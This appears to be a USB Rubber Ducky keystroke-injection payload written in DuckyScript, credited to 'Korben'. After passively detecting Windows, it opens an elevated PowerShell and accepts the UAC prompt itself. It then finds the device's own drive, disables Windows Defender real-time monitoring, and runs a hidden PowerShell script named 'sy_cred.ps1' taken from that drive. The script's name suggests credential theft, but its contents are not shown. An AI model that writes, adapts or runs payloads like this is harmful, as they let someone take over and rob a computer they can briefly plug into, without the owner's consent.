73 lines
1.9 KiB
Plaintext
73 lines
1.9 KiB
Plaintext
ATTACKMODE HID STORAGE
|
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
|
REM VERSION 1.1
|
|
REM AUTHOR: Korben
|
|
|
|
REM_BLOCK DOCUMENTATION
|
|
Windows fully passive OS Detection and passive Detect Ready
|
|
Includes its own passive detect ready.
|
|
Does not require additional extensions.
|
|
|
|
USAGE:
|
|
Extension runs inline (here)
|
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
boot delay
|
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
|
See end of payload for usage within payload
|
|
END_REM
|
|
|
|
REM CONFIGURATION:
|
|
DEFINE #MAX_WAIT 150
|
|
DEFINE #CHECK_INTERVAL 20
|
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
|
DEFINE #NOT_WINDOWS 7
|
|
|
|
$_OS = #NOT_WINDOWS
|
|
|
|
VAR $MAX_TRIES = #MAX_WAIT
|
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
|
DELAY #CHECK_INTERVAL
|
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
|
END_WHILE
|
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
|
$_OS = WINDOWS
|
|
END_IF
|
|
|
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
|
IF ($_OS == WINDOWS) THEN
|
|
STRING HELLO WINDOWS!
|
|
ELSE
|
|
STRING HELLO WORLD!
|
|
END_IF
|
|
END_REM
|
|
END_EXTENSION
|
|
|
|
DEFINE #DUCKY_DRIVER_LABEL DUCKY
|
|
DEFINE #PS1 sy_cred.ps1
|
|
|
|
IF ($_OS == WINDOWS )THEN
|
|
|
|
DELAY 200
|
|
REM -----open Powershell as Admin
|
|
GUI r
|
|
DELAY 200
|
|
STRING powershell
|
|
CTRL-SHIFT ENTER
|
|
DELAY 400
|
|
LEFT
|
|
DELAY 150
|
|
ENTER
|
|
DELAY 500
|
|
STRINGLN_POWERSHELL
|
|
|
|
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
|
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
|
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
|
|
exit
|
|
|
|
END_STRINGLN
|
|
|
|
|
|
|
|
END_IF
|